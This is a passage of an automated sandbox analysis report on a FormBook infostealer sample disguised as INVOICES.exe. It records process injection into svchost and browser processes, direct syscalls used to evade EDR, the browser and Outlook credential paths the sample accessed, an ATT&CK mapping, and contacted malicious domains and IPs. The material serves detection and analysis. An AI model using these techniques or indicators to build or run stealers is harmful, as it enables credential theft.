                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]2_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]2_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov esi, dword ptr fs:[00000030h]2_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]2_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]2_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]2_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]2_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]2_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]2_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03642840 mov ecx, dword ptr fs:[00000030h]2_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660854 mov eax, dword ptr fs:[00000030h]2_2_03660854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]2_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]2_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007881D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_007881D4
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0075A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0075A2D5
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0075A2A4 SetUnhandledExceptionFilter,0_2_0075A2A4

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtUnmapViewOfSection: Direct from: 0x77462D3CJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\INVOICES.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\AtBroker.exeThread register set: target process: 7636Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\AtBroker.exeThread APC queued: target process: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\INVOICES.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2BC1008Jump to behavior
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00788A73 LogonUserW,0_2_00788A73
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00733B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00733B4C
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00734A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00734A35
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00794CFA mouse_event,0_2_00794CFA
                Source: C:\Users\user\Desktop\INVOICES.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\INVOICES.exe"Jump to behavior
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007881D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_007881D4
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00794A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00794A08
                Source: INVOICES.exe, 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: INVOICES.exe, XORjEgwNIUb.exe, 00000004.00000002.3876881594.00000000011A1000.00000002.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000004.00000000.1576010985.00000000011A0000.00000002.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877149720.00000000016D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: XORjEgwNIUb.exe, 00000004.00000002.3876881594.00000000011A1000.00000002.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000004.00000000.1576010985.00000000011A0000.00000002.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877149720.00000000016D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: XORjEgwNIUb.exe, 00000004.00000002.3876881594.00000000011A1000.00000002.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000004.00000000.1576010985.00000000011A0000.00000002.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877149720.00000000016D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: XORjEgwNIUb.exe, 00000004.00000002.3876881594.00000000011A1000.00000002.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000004.00000000.1576010985.00000000011A0000.00000002.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877149720.00000000016D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007587AB cpuid 0_2_007587AB
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00765007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00765007
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0077215F GetUserNameW,0_2_0077215F
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007640BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_007640BA
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00734AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00734AFE

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3877127380.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3875893273.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3877005602.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1651329833.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1654342305.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3877109191.00000000027F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1651003689.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: INVOICES.exeBinary or memory string: WIN_81
                Source: INVOICES.exeBinary or memory string: WIN_XP
                Source: INVOICES.exeBinary or memory string: WIN_XPe
                Source: INVOICES.exeBinary or memory string: WIN_VISTA
                Source: INVOICES.exeBinary or memory string: WIN_7
                Source: INVOICES.exeBinary or memory string: WIN_8
                Source: INVOICES.exe, 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3877127380.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3875893273.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3877005602.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1651329833.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1654342305.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3877109191.00000000027F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1651003689.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007A6399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_007A6399
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007A685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_007A685D

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		31
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                Software Packing                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		1
                DLL Side-Loading                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Virtualization/Sandbox Evasion                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
                Process Injection                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544728 Sample: INVOICES.exe Startdate: 29/10/2024 Architecture: WINDOWS Score: 100 28 www.68529.xyz 2->28 30 www.treatyourownhip.online 2->30 32 18 other IPs or domains 2->32 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected FormBook 2->44 46 Binary is likely a compiled AutoIt script file 2->46 50 3 other signatures 2->50 10 INVOICES.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 XORjEgwNIUb.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 AtBroker.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 XORjEgwNIUb.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.68529.xyz 107.163.130.253, 49745, 49746, 49747 TAKE2US United States 22->34 36 www.plyvik.info 67.223.117.142, 49741, 49742, 49743 VIMRO-AS15189US United States 22->36 38 11 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                INVOICES.exe47%ReversingLabsWin32.Trojan.AutoitInject
                INVOICES.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
